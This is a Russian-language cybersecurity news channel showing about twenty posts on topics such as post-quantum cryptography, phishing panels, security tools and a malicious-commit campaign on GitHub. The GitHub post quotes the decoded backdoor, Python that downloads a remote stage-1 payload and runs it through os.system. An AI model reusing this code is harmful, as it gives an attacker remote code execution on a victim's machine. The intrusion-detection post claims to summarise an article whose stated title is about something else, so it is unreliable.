SecureTechTalks


Kanal geosi va tili: Butun dunyo, Ruscha


Добро пожаловать на канал "SecureTechTalks"! Мы предлагаем вам увлекательное и информативное погружение в мир кибербезопасности. Здесь вы найдете актуальные новости, советы, методы и инсайты по инфобезу.

Связанные каналы  |  Похожие каналы

Kanal geosi va tili
Butun dunyo, Ruscha
Statistika
Postlar filtri


🛡️ Учим школьников безопасности в интернете: бесплатный курс от Яндекса

🖥️ «Яндекс Браузер для образования» в сотрудничестве с «Яндекс Учебником» представили новый онлайн-курс для школьников 7-9 классов. Этот образовательный проект обучает базовым навыкам безопасного поведения в интернете: как распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли.

📊 Проблема актуальна как никогда: по данным исследований, около 72% школьников сталкиваются с онлайн-мошенничеством. Ежедневно «Яндекс Браузер» блокирует более 600 мошеннических доменов, многие из которых маскируются под игровые сайты. Такие ресурсы заманивают школьников обещаниями бесплатных бонусов, раннего доступа к играм или участия в турнирах с призами. После перехода по ссылкам детей просят ввести свои логины и пароли, которые затем попадают к злоумышленникам.

🔍 Как защитить школьников?
Курс предлагает погрузиться в интерактивный детективный квест, где школьники на практике учатся:
- Различать фишинговые сайты;
- Понимать, зачем нужна двухфакторная аутентификация;
- Создавать и использовать надёжные пароли.

📚 Структура курса
Курс включает два урока продолжительностью по 20-25 минут:
1️⃣ Защита аккаунтов: как настроить безопасность и предотвратить утечку данных.
2️⃣ Распознавание мошеннических сайтов: что такое фишинг и как не попасться на уловки злоумышленников.

Учителя могут использовать эти материалы на уроках информатики или рекомендовать их для самостоятельного изучения дома.

🔒 О проекте «Яндекс Браузер для образования»
Эта специальная версия браузера создана для школ и образовательных учреждений. Она:
- Очищает все пользовательские данные после окончания урока;
- Фильтрует контент, ограничивая доступ к нежелательным ресурсам;
- Помогает создавать безопасное цифровое пространство для учеников и учителей.

🌐 Доступ к курсу бесплатный. Он размещён на платформе «Яндекс Учебник» и доступен каждому.

Stay secure and read SecureTechTalks 📚

#кибербезопасность #цифроваяграмотность #SecureTechTalks #интернетбезопасность #Яндекс


🛡Стратегия защиты от квантовых угроз

🔒 Квантовые компьютеры и угроза безопасности
С развитием квантовых технологий наши привычные системы шифрования сталкиваются с новой реальностью. Алгоритмы, такие как RSA, основанные на сложных математических расчетах, могут быть вскоре скомпрометированы квантовыми компьютерами. Доклад NIST предлагает стратегическую дорожную карту для перехода к квантово-устойчивой криптографии, способной защитить данные в этой новой эре.

🔍 Квантовые компьютеры способны взламывать многие современные шифры, ставя под угрозу долгосрочные данные. Утечка данных сегодня может обернуться их расшифровкой через несколько лет, когда квантовые системы станут более развитыми. Документ предлагает комплексный подход к подготовке организаций к таким вызовам.

🛤 Трехуровневая стратегия перехода: STL-QCRYPTO

Разработанная структура охватывает три ключевых уровня безопасности:

1️⃣ STL-1: Основной уровень
Использование алгоритмов постквантовой криптографии, таких как CRYSTAL-Kyber и SPHINCS+.
Подходит для быстрого внедрения с минимальными изменениями в инфраструктуре.

2️⃣ STL-2: Промежуточный уровень
Гибридный подход: использование квантовых генераторов случайных чисел (QRNG) совместно с классическими алгоритмами.
Усиление защиты через истинно случайные ключи.

3️⃣ STL-3: Продвинутый уровень
Переход на квантовую криптографию (QKD) для максимально безопасного обмена ключами.
Полный переход на квантовые технологии требует значительных ресурсов, но обеспечивает непревзойденную безопасность.

🔗 Подробнее про исследование можно прочитать тут.

Stay secure and read SecureTechTalks 📚

#КвантоваяКриптография #Кибербезопасность #ПостквантоваяЗащита #SecureTechTalks


🔐 Искусственный интеллект и управление доступом: новая эра безопасности

🤖 Искусственный интеллект и управление доступом кардинально меняют подходы к обеспечению безопасности. Сегодня IAM выходит за рамки защиты человеческих идентификаторов и охватывает автономные системы, API и подключенные устройства.

📊 Как AI влияет на ключевые элементы IAM?

🛡️ Интеллектуальный мониторинг и обнаружение аномалий

AI анализирует поведение как человеческих, так и машинных идентификаторов, включая API и сервисные учетные записи. Он создает базовые показатели "нормального" поведения и мгновенно обнаруживает отклонения, сигнализирующие о возможных угрозах.
Например, AI может выявить необычные модели доступа в контейнеризированных приложениях или аномальные объемы передачи данных, предотвращая потенциальные утечки на ранних стадиях.

📜 Расширенное управление доступом (Access Governance)

AI позволяет реализовать принцип наименьших привилегий, анализируя поведенческие данные идентификаторов и автоматизируя управление правами. В реальном времени система выявляет нарушения политик и адаптирует настройки безопасности под текущую ситуацию.
Кроме того, AI обеспечивает контекстно-зависимую аутентификацию, оценивая риск на основе данных о чувствительности ресурсов и текущей угрозе, создавая надежную защиту без помех для легитимных пользователей.

🚀 Улучшение пользовательского опыта

AI оптимизирует процесс управления доступом:
- Автоматизация назначения ролей на основе функционала сотрудников.
- Реализация динамического доступа Just-in-Time (JIT), который активируется только при необходимости. Это минимизирует привилегии, которые могут быть использованы злоумышленниками.

🛠️ Персонализация и настройка

AI анализирует поведение пользователей и рабочие процессы, автоматически предлагая индивидуализированные настройки, которые уменьшают риски.
Например, временные сотрудники получают доступ, ограниченный сроком их работы, а подрядчикам предоставляются только те права, которые необходимы для выполнения задач.

🔎 Снижение ложных срабатываний

Традиционные системы обнаружения угроз часто страдают от высокого уровня ложных срабатываний. AI анализирует большие массивы данных, чтобы минимизировать такие ошибки и сосредоточиться на реальных угрозах, что ускоряет реакцию и оптимизирует использование ресурсов.

🛠️ Практическое применение AI в IAM

1. Управление привилегированным доступом (PAM)
AI отслеживает и блокирует подозрительные действия привилегированных учетных записей.
💡 Например, если поведение отклоняется от обычного, система автоматически завершает сессию.

2. Управление идентификацией и администрирование (IGA)
AI автоматизирует жизненный цикл машинных идентификаторов, минимизируя избыточные привилегии. Это особенно важно в условиях масштабируемых облачных сред.

3. Управление секретами
AI помогает управлять ключами и паролями, прогнозируя сроки их действия и предлагая автоматическую ротацию для высокорискованных секретов. Это распространяется на DevOps-платформы, CI/CD, и инструменты совместной работы.

🧠 Атаки на машинные идентификаторы

С помощью машинного обучения AI может моделировать атаки на машинные идентификаторы, выявляя потенциальные слабые места. Это позволяет компаниям заранее усиливать защиту и улучшать стратегию IAM.

🔮 Будущее IAM с AI

Эволюция IAM превращает кибербезопасность из реактивного подхода в проактивный. Искусственный интеллект не только защищает, но и прогнозирует угрозы, адаптируя защитные механизмы под новые вызовы.

Stay secure and read SecureTechTalks 📚

#IAM #AI #Кибербезопасность #УправлениеДоступом #МашинноеОбучение


⚠️ GitHub атакован: вредоносные коммиты с бэкдорами

👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.

🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.

🧩 Механика

🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:

import os 
import urllib 
import urllib.request 

x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload") 
y = x.read() 
z = y.decode("utf8") 
x.close() 
os.system(z)


💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.

🔍 Расследование атак

👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.

🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.

🛡️ Рекомендации для защиты

1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.

🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.

Stay secure and read SecureTechTalks 📚

#GitHub #Киберугрозы #ОткрытыйКод #Безопасность


🧑‍🏫 Учим школьников криптографии: инструмент CryptoEL для увлекательного и практического обучения

📚 В современном мире, где цифровая безопасность становится важнее с каждым днём, криптография остаётся сложной, но необходимой темой. Специалисты из Университета Массачусетса Лоуэлла разработали CryptoEL, инновационный инструмент, который делает обучение криптографии увлекательным и доступным для школьников.

Что такое CryptoEL?

CryptoEL основан на модели обучения через опыт (Experiential Learning) и включает четыре этапа:

1. Конкретный опыт — учащиеся погружаются в сценарии из реальной жизни, наблюдая за передачей данных в идеальных и уязвимых условиях.
2. Рефлексивное наблюдение — анализ происходящего через беседы с AI-ассистентом CryptoCoach.
3. Абстрактная концептуализация — изучение концепций криптографии через интерактивные видеоматериалы и симуляции.
4. Активный эксперимент — выполнение практических заданий с использованием встроенного терминала Python.

Такой подход позволяет школьникам не только понять теорию, но и применить знания на практике, решая реальные задачи в области безопасности данных.

Основные модули CryptoEL

1. Хеширование 🔐 В модуле демонстрируется, как защита данных помогает сохранять их целостность. Ученики видят, как атаки могут изменить сообщения, и изучают, как хеширование позволяет защититься от этих изменений.
2. Симметричная криптография 📤 Используя сценарий с чат-приложением, школьники узнают, как шифрование данных помогает обеспечить конфиденциальность. Они учатся генерировать ключи, шифровать сообщения и предотвращать атаки.
3. Асимметричная криптография 🛡️ Здесь учащиеся работают с ключами для шифрования и дешифрования, что помогает им понять, как функционируют системы с публичными и приватными ключами, используемые в современных протоколах безопасности.

🔎 Опросы показали, что лишь 5% старшеклассников и менее 1% учеников средней школы изучают криптографию. CryptoEL восполняет этот пробел, делая сложные концепции доступными через визуализации, интерактивные задания и AI-помощь.

Результаты тестирования

🧪 Исследование с участием 51 школьника показало:
- 93% участников сочли инструмент полезным и увлекательным.
- Уровень понимания криптографических концепций после обучения вырос на 85–95%.
- Школьники отметили, что интерактивные симуляции и визуализации помогают легче усваивать материал.

Stay secure and read SecureTechTalks 📚

#CryptoEL #Кибербезопасность #Образование #Шифрование


🛡Google тестирует новую функцию для защиты электронной почты: Shielded Email

🔍 Эксперты Android Authority обнаружили в обновлении Google Play Services версии 24.45.33 фрагменты кода, намекающие на разработку функции Shielded Email.

📧 Фича предназначена для создания временных или ограниченно используемых псевдонимов электронной почты, которые перенаправляют письма на основной аккаунт. При появлении нежелательной рассылки пользователь сможет отключить переадресацию, сохранив конфиденциальность основного адреса.

🔒 Shielded Email поможет защититься от спама, минимизировать последствия утечек данных и снизить риск онлайн-отслеживания. Такой подход может стать важным инструментом для обеспечения цифровой безопасности.

🛠 Функция уже появилась в настройках автозаполнения, но на данный момент при попытке её активировать пользователь перенаправляется на пустую страницу myaccount.google.com.

Stay secure and read SecureTechTalks 📚

#cybersecurity #google #ShieldedEmail #privacy #SecureTechTalks


Аппаратная безопасность под угрозой: ключевые выводы из нового отчёта NIST

🌐 Национальный институт стандартов и технологий США (NIST) опубликовал отчёт «Сценарии отказов аппаратной безопасности: потенциальные аппаратные уязвимости» (NIST IR 8517), который проливает свет на скрытые угрозы в аппаратном обеспечении. Документ рассматривает, как ошибки, заложенные на этапе проектирования чипов, могут стать причиной серьёзных рисков, которые сложно устранить после запуска продукции.

📌 В отчёте представлено 98 сценариев, иллюстрирующих, как злоумышленники могут воспользоваться уязвимостями в аппаратной архитектуре и реализации:
- Ошибки в управлении доступом.
- Нарушение стандартов кодирования.
- Проблемы жизненного цикла разработки.

Сценарии описывают, как можно обойти существующие механизмы защиты, получить доступ к конфиденциальной информации или нарушить работу систем.

🔒 Необходимость ранней интеграции мер безопасности
NIST подчёркивает, что на этапе разработки оборудования необходимо сразу внедрять меры безопасности, так как исправление аппаратных уязвимостей гораздо сложнее, чем устранение багов в программном обеспечении.

💡 Хотя как аппаратные, так и программные ошибки связаны с использованием сложного кода, аппаратные уязвимости имеют уникальную природу. Они требуют другого подхода и более глубокого анализа.

Stay secure and read SecureTechTalks 📚

#NIST #CyberSecurity #HardwareSecurity #SecureTechTalks


🛜 Chrome и ИИ: новые функции безопасности

🌐 Google улучшили защиту Chrome, добавив ИИ. Теперь функция «Улучшенная защита» в Chrome использует искусственный интеллект для обеспечения более надежной защиты в реальном времени. Она анализирует веб-сайты, загрузки и расширения, выявляя потенциально опасные ресурсы. Даже если Google ранее не классифицировала сайт как опасный, ИИ поможет заблокировать доступ и предупредит пользователя.

⚡ Основные улучшения:

- Глубокий анализ загрузок.
- Улучшенная работа всех связанных с Chrome сервисов Google.
- Предупреждения о неизвестных и потенциально опасных ресурсах.

💡 Новые функции управления вкладками

Google обновила работу с вкладками в Chrome Canary:
- Группировка вкладок с ИИ: теперь вкладки автоматически организуются для удобства.
- Просмотр неактивных вкладок: вместо автоматического закрытия вкладок, неактивных более семи дней, пользователи могут сначала их просмотреть.

🌍 ИИ для переводов

Google также тестирует API, использующий машинное обучение для перевода текста. Эта функция упростит перевод контента на веб-страницах и введённого текста, например в чатах или на форумах.

Stay secure and read SecureTechTalks 📚

#Chrome #CyberSecurity #AI #Google #SecureTechTalks


🎣 Анализ фишинговых панелей для кражи аккаунтов Telegram и WhatsApp

💡 Эксперты компании F.A.C.C.T. провели исследование веб-панелей, которые злоумышленники используют для создания фишинговых сайтов. Эти ресурсы предназначены для обмана пользователей и захвата их учетных записей в мессенджерах Telegram и WhatsApp.

🔎 Как работают фишинговые сайты?
На таких сайтах пользователям предлагают «бесплатный Telegram Premium», возможность «пробить» данные других пользователей или «накрутить лайки». Подобные обещания привлекают невнимательных людей, которые в итоге лишаются своих аккаунтов.

📊 Количество фишинговых ресурсов растёт
Эксперты выявили шесть панелей для Telegram и одну для WhatsApp, которые позволяют создавать такие сайты. Одна из панелей за первые шесть месяцев 2024 года помогла создать более 900 фишинговых ресурсов. Основные приманки включают бесплатные подписки, участие в голосованиях и доступ к приватным каналам.

💸 Масштаб проблемы
Украденные данные продаются на подпольных маркетплейсах. Доходы опытных злоумышленников составляют от 600 000 до 2,5 млн рублей в месяц.

🔧 Популярные панели и их возможности
- Social Engineering: позволяет создавать фальшивые сайты с кастомными шаблонами. Пользователи панели управляют страницами, отслеживают статистику и рейтинг украденных сессий.
- Teletron: предлагает до 10 шаблонов, включая «Telegram Premium» и денежные призы. Злоумышленники могут привязывать домены и выставлять украденные аккаунты на продажу.
- Wphisher (для WhatsApp): предоставляет шаблоны для сайтов с QR-кодами и фейковыми голосованиями. Сессии сохраняются в виде Chrome-профилей, что позволяет захватывать учетные записи и отправлять от их имени мошеннические сообщения.

📢 Методы привлечения жертв
Основной способ — это реклама в соцсетях. Пользователям предлагают перейти по ссылкам на ресурсы, якобы предоставляющие бесплатные услуги или уникальные возможности.

🛡️ Как защититься?
- Включайте двухфакторную аутентификацию.
- Проверяйте ссылки перед переходом.
- Никогда не вводите коды подтверждения из сообщений на подозрительных сайтах.
- При неожиданном выходе из аккаунта немедленно обращайтесь в техподдержку, завершайте сторонние сессии и меняйте пароль.

Stay secure and read SecureTechTalks 📚

#CyberSecurity #Telegram #WhatsApp #Phishing #SecureTechTalks


🖥 Powerpipe: Open-source инструменты для визуализации и мониторинга DevOps

💡 Powerpipe – open-source решение, созданное для упрощения управления DevOps-процессами. Продукт предоставляет набор инструментов визуализации и мониторинга соответствия заданным стандартам.

🔍 Динамические дашборды и отчёты
Powerpipe позволяет создавать кастомизируемые дашборды с ключевыми показателями, маркируя неправильные настройки и критические точки. С помощью фильтров, кубов данных и создания снепшотов состояния системы можно оперативно управлять состоянием инфраструктуры.

📏 Индустриальные стандарты
Платформа предоставляет доступ к более чем 5000 open-source настройкам, соответствующих стандартам CIS, NIST, PCI, HIPAA и FedRAMP. Проверки можно запускать локально или интегрировать в конвейер развёртывания, чтобы обеспечить соответствие требованиям безопасности.

🕸️ Диаграммы связей
Powerpipe создан для визуализации связей и зависимостей между данными в вашей облачной среде. Исследуйте инфраструктуру в деталях, чтобы получить ясную картину имеющихся ресурсов и взаимосвязей.

💻 Подход «Code-first»
Powerpipe ориентирован на DevOps-команды, предлагая управление через код вместо кликов. Дашборды версионируемые, модульные и легко интегрируемые в рабочие процессы, обеспечивая максимальную гибкость и точность.

🛠️ Готовые модули
Powerpipe предоставляет преднастроенные модули (mods), которые поддерживают AWS, Azure, GCP, Kubernetes, Terraform, GitHub, M365 и другие популярные платформы. Среди доступных кейсов — безопасность и соответствие требованиям, управление затратами, анализ активов и их инвентаризация.

Большинство модулей написано для работы с экосистемой плагинов Steampipe, однако Powerpipe поддерживает и другие источники данных, такие как Postgres, SQLite, DuckDB и MySQL.

Powerpipe доступен бесплатно на GitHub.

Stay secure and read SecureTechTalks 📚

#DevOps #CyberSecurity #Powerpipe #OpenSource #SecureTechTalks


🚪 Прозрачность и защита ИИ: Важность открытого обмена информацией о уязвимостях

💡 Сегодня защита ИИ требует более ответственного подхода и открытого обмена информацией о его уязвимостях. Фил Венейблс из Google Cloud подчёркивает, что выявление и раскрытие уязвимостей усиливают защиту, уменьшая риски атак и помогая всему сектору. Google использует собственную команду AI Red Team и разработала Secure AI Framework (SAIF) для повышения безопасности ИИ.

🔍 Роль исследования уязвимостей
Атаки на ИИ становятся всё сложнее, и потому своевременные исследования критически важны. Google Cloud Vulnerability Research (CVR) недавно нашла уязвимости в Vertex AI и поделилась ими с другими платформами, чтобы предотвратить повторение подобных проблем.

🤝 Культура безопасности
Открытое обсуждение и обнародование проблем безопасности – не слабость, а знак зрелости и приверженности к улучшению технологий. Прозрачность помогает всем заинтересованным сторонам, создавая надёжные стандарты безопасности в AI-индустрии.

🔗 Совместные инициативы: SAIF и коалиции
Google разрабатывает SAIF и объединяет усилия с другими, чтобы установить единые стандарты безопасности для ИИ. Это поможет защитить экосистему и снизить риски утечек данных.

📈 Прогнозы и стандарты безопасности
Google нацелены на стандартизацию безопасности ИИ, чтобы обеспечить пользователям надёжную защиту. Работа над безопасностью ИИ как отраслевым стандартом поможет в создании доверия и раскрытии потенциала ИИ.

📉 Уход Лилиан Венг из OpenAI
В то время как Google усиливает позиции в безопасности, OpenAI столкнулся с рядом увольнений. Лилиан Венг, глава исследований безопасности, решила покинуть компанию, что, по её словам, было непростым решением. На фоне ухода ведущих специалистов в области безопасности OpenAI сталкивается с обвинениями, что коммерция перевешивает приоритеты в защите ИИ.

Stay secure and read SecureTechTalks 📚

#AIsecurity #VulnerabilityResearch #GoogleAI #CyberSecurity #SecureTechTalks #ИИ


👻 Silent Skimmer: Возвращение атак на платёжные системы

💥 Исследователи из Unit 42 зафиксировали новую активность группы Silent Skimmer, известной по атакам на платёжные сервисы в 2023 году. В мае 2024 года злоумышленники использовали уязвимости веб-серверов крупной компании в Северной Америке, применив технологии обхода защит.

🛠 Хакеры использовали уязвимости CVE-2017-11317 и CVE-2019-18935 для доступа к системе, устанавливая обратные прокси и веб-оболочки. Благодаря этим инструментам, они обеспечили постоянное подключение к сети компании и внедрили PowerShell-скрипты для повышения привилегий.

🔍 Для защиты от обнаружения хакеры использовали смешанные сборки на .NET и C++. Они применяли Python-скрипты для эксфильтрации данных, упаковывая их с помощью PyInstaller, что позволяло скрыть вредоносный функционал под видом легитимных файлов.

⚠️ Киберпреступники использовали «mshta.exe» для запуска HTA-файлов с вредоносными командами, задействовав PowerShell для выполнения скрытых действий и подключения к базам данных.

👥 Эксперты кибербезопасности рекомендуют незамедлительное обновление уязвимых программ и внедрение продвинутых защитных решений, таких как Cortex XDR, Advanced URL Filtering и Advanced DNS Security.

Stay secure and read SecureTechTalks 📚

#CyberSecurity #SilentSkimmer #ThreatIntelligence #SecureTechTalks #ПлатежныеСистемы #Киберугрозы


🌏 GeogGNN: Новый Подход к Прогнозированию Киберпреступлений с учетом Географических Данных

Исследователи из Объединённых Арабских Эмиратов и Иордании представили уникальный метод прогнозирования киберпреступлений с помощью Географически Взвешенных Графовых Нейронных Сетей (GeogGNN). Новая модель объединяет пространственные координаты инцидентов, что позволяет учитывать географические зависимости и улучшать точность классификации киберугроз.

🌐 Модель GeogGNN — это прорыв в анализе угроз, поскольку традиционные нейронные сети не учитывают пространственные аспекты, и GeogGNN восполняет этот пробел.

🔍 Прогнозирование кибератак становится точнее: правоохранительные органы смогут определять потенциальные «горячие точки» для кибератак, эффективно распределять ресурсы и заранее принимать меры для повышения уровня безопасности.

💡 GeogGNN учитывает, что кибератаки имеют определённые закономерности распространения, которые можно проанализировать с учётом географических факторов. Модель способна предсказать, какие регионы могут стать уязвимыми и адаптировать меры противодействия угрозам.

🌍  Данный метод может стать основой для создания более точных систем мониторинга и анализа кибератак на глобальном уровне, что особенно важно в условиях растущей глобализации киберугроз.

🔗 Подробнее о GeogGNN можно прочитать в научной статье

Stay secure and read SecureTechTalks 📚
#CyberSecurity #AI #NeuralNetworks #CyberThreats #SecureTechTalks #GeogGNN #Кибербезопасность #Прогнозирование


🛡В полной изоляции: бенчмарк для оценки защищенности контейнеров

"Am I Isolated" — инструмент с открытым исходным кодом для оценки безопасности контейнеров. Инструмент разработан на базе Rust. Он запускается внутри контейнера, анализирует возможные уязвимости и предлагет рекомендации для повышения уровня безопасности.

🛡 Возможности Am I Isolated:
- Проверка изоляции контейнеров для снижения рисков «утечек».
- Обнаружение скрытых привилегий и типичных ошибок конфигурации DevOps.
- Непрерывное тестирование для защиты от актуальных техник выхода из контейнера.

🤖 Изоляция контейнеров – основа безопасности, особенно в условиях многопользовательских облачных сред, где критична защита от несанкционированного доступа к соседним процессам.

📈 Будущее и планы:
Am I Isolated планирует добавление весовых оценок рисков и улучшение визуализации для более понятного представления данных.

🔗 С подробностями можно ознакомиться и загрузить инструмент на GitHub.

Stay secure and read SecureTechTalks 📚

#containersecurity #cloudnative #cybersecurity #SecureTechTalks


🛡Шифровать легко: age

🌐 Что такое age?
age — инструмент шифрования, разработанный для простой защиты данных. С его помощью можно безопасно зашифровать файлы для хранения на облачных сервисах. Программа использует проверенные алгоритмы ChaCha20 и Poly1305, что обеспечивает надежную криптостойкость.

🔐 Безопасность и простота использования
age работает через командную строку, поэтому для шифрования файлов достаточно пары команд. При этом его удобно использовать с существующими SSH-ключами, избавляя от необходимости создавать новые ключи. Поддерживается шифрование сразу для нескольких получателей, что удобно для командной работы.

💼 Ключевые преимущества age

1. Минимизация риска ошибок: Отсутствие сложных настроек снижает риск неправильного использования.

2. Быстрое внедрение: Через age можно зашифровать файлы за считанные минуты.

3. Надежная криптография: Алгоритмы ChaCha20 и Poly1305 гарантируют высокую степень защиты данных, которая подходит для повседневных нужд.

🤖 Принцип работы age включает симметричное шифрование с использованием случайного ключа. Этот ключ, в свою очередь, зашифровывается для каждого из получателей, что позволяет хранить зашифрованные файлы на облачных платформах без риска доступа посторонних лиц.

📥 Команды для шифрования просты и интуитивно понятны:

Для шифрования:
$ age -p -o file.age file


Для расшифровки:
$ age -d -o file file.age


💡Автор age Филиппо Вальсорд, специалист в области безопасности Google, выбрал для инструмента самые подходящие алгоритмы шифрования, благодаря чему age сочетает простоту, скорость и надежность.

🔗 Ссылка на GitHub

Stay secure and read SecureTechTalks 📚

#шифрование #age #кибербезопасность #SecureTechTalks


👮‍♂ Роскомнадзор и блокировка интернета: что произошло?

⚠️ Сегодня ночью Роскомнадзор ограничил доступ ко множеству ресурсов, что вызвало волну жалоб. Ограничения коснулись сайтов, использующих технологию шифрования Encrypted Client Hello (ECH).

🌐 Около месяца назад Cloudflare, популярный облачный провайдер, включил ECH для своих клиентов. Это позволило скрывать доменное имя сайта при подключении, облегчая обход блокировок. В ответ Роскомнадзор заблокировал сайты с поддержкой ECH.

🔗 Пользователи отмечают, что через VPN сайты работают стабильно. Сайты, использующие старые версии TLS, остаются доступными.

Stay secure and read SecureTechTalks 📚

#Роскомнадзор #Cloudflare #БлокировкаИнтернета #Кибербезопасность #SecureTechTalks


👨‍🔬 Анализ современных подходов к обнаружению вторжений в корпоративные сети

Всем привет! На днях на Хабре вышла статья "Как мы нашли уязвимость в SQLite при помощи LLM". Тема довольно актуальна, поэтому спешим поделиться кратким саммери:

🔍 В статье представлено подробное исследование методик, применяемых для выявления вторжений в корпоративные сети, что особенно актуально в условиях постоянно растущих киберугроз. Основные методы анализа включают сигнатурный и поведенческий анализ, а также машинное обучение.

👥 Сигнатурный анализ основан на сопоставлении трафика с известными образцами атак, но имеет ограничения — такие системы не могут обнаруживать новые, неизвестные угрозы.

🤖 Поведенческий анализ отслеживает отклонения в сетевом трафике, выявляя подозрительные действия на основе базовых данных о нормальном поведении. Однако, для этого требуется регулярное обновление профилей и настроек системы.

📈 Машинное обучение активно развивается и показывает хорошие результаты, так как позволяет анализировать огромные объемы данных и выявлять скрытые угрозы. Недостаток заключается в сложности настройки и обучении модели на специфических данных компании.

👨‍💻 Авторы статьи подчеркивают важность человеческого фактора. Даже самая продвинутая система требует поддержки со стороны специалистов для корректной интерпретации результатов и оперативного реагирования.

🔒 Оптимальным решением является комбинированный подход, где все методы работают совместно, дополняя и усиливая друг друга. Это снижает вероятность ложных срабатываний и повышает шансы на своевременное обнаружение сложных угроз.

Stay secure and read SecureTechTalks 📚

#информационнаябезопасность #кибербезопасность #IDS #машиннообучение #корпоративнаясеть #анализугроз #сетевойанализ


🚀 Whispr: Инструмент для безопасной работы с секретами

Whispr — открытый CLI-инструмент для безопасной передачи секретов из хранилищ, таких как AWS Secrets Manager и Azure Key Vault, напрямую в окружение приложения. Такой подход повышает безопасность и упрощает процесс разработки, устраняя необходимость в хранении секретов в текстовых файлах.

🔑 Ключевые функции Whispr
• Безопасная доставка секретов: Загрузка секретов через HTTPS и наличие проверки сертификатов.
• Just-In-Time доступ: Устанавливает переменные среды только по запросу.
• Простая настройка: Управление конфигурациями на уровне проекта без скриптов.
• Поддержка различных платформ: Простая установка через PyPi.

⚙️ Инструмент помогает избежать хранения секретов в незащищённых файлах (.env), которые часто используют злоумышленники, и упрощает процесс работы с секретами. MITRE ATT&CK указывает на подобные атаки как на один из основных векторов атак.

🔗 Узнать подробности и скачать Whispr можно на GitHub.

Stay secure and read SecureTechTalks 📚

#Безопасность #Whispr #Секреты #SecureTechTalks


📏 Что такое Precision Time Protocol (PTP)?
PTP — это сетевой протокол, обеспечивающий синхронизацию часов между устройствами с микросекундной точностью. Разработанный для высокоскоростных и критически важных сетей, PTP стал важным компонентом в таких отраслях, как финансы, энергетика, и телекоммуникации. Протокол работает через обмен временными метками, что позволяет устройствам корректировать своё внутреннее время.

⏱️ Основные задачи и кейсы применения
PTP обеспечивает временную синхронизацию, которая особенно важна для таких задач, как биржевая торговля, где время транзакции влияет на финансовый результат. Также он используется в электросетях для контроля фазировки и предотвращения сбоев, в медиаиндустрии для синхронизации аудио- и видеопотоков и в высокочастотных измерительных системах.

⚠️ Преимущества и минусы PTP
Протокол PTP достигает высокой точности синхронизации, но он чувствителен к сетевым задержкам и имеет ряд уязвимостей. Например, сетевые атаки типа man-in-the-middle или атаки на точность таймштампов могут искажать временные данные, влияя на критически важные процессы. Защита PTP требует дополнительной инфраструктуры и протоколов безопасности.

🛠️ Решения для повышения безопасности PTP
Существуют подходы к защите PTP, включая шифрование временных меток и использование систем обнаружения аномалий, что повышает устойчивость сети к возможным атакам. Применение защищённых коммутаторов, поддерживающих PTP, а также использование специальных механизмов компенсации задержек могут значительно снизить риск.

🔗 Подробнее о протоколе можно прочитать здесь.

Stay secure and read SecureTechTalks 📚

#PTP #Тайминг #Синхронизация #Кибербезопасность #SecureTechTalks


🛡Использование языковых моделей для блокировки DGA и DNS-эксфильтрации в сетях

🔍 Исследователи из Техасского университета и Чешского технического университета предложили методику, которая позволяет блокировать вредоносные DGA-домены и эксфильтрацию данных через DNS с помощью больших языковых моделей. Метод ориентирован на выявление динамически генерируемых доменных имен, которые хакеры используют для скрытого взаимодействия с командными серверами (C&C).

🛡️ В отличие от традиционных методов анализа, LLM были дообучены для определения паттернов DGA и эксфильтрации данных. В тренировочных данных использовались доменные имена из 59 семейств вредоносного ПО, а также примеры DNS-эксфильтрации из корпоративных сетей. Подход показал высокую точность и стойкость к новым вариациям вредоносных доменов.

📊 Методика способна анализировать потоки данных, определять потенциальные угрозы и блокировать их до того, как они смогут нанести вред корпоративной инфраструктуре. Благодаря гибкости LLM, такая защита эффективно выявляет и фильтрует как уже известные вредоносные домены, так и новые DGA-генераторы, которые только появляются на горизонте.

🔗 Подробнее о методике можно прочитать здесь

Stay secure and read SecureTechTalks 📚

#SecureTechTalks #кибербезопасность #DGA #DNSэксфильтрация #LLM #информационнаябезопасность #исследования #ИИ #защита

20 ta oxirgi post ko‘rsatilgan.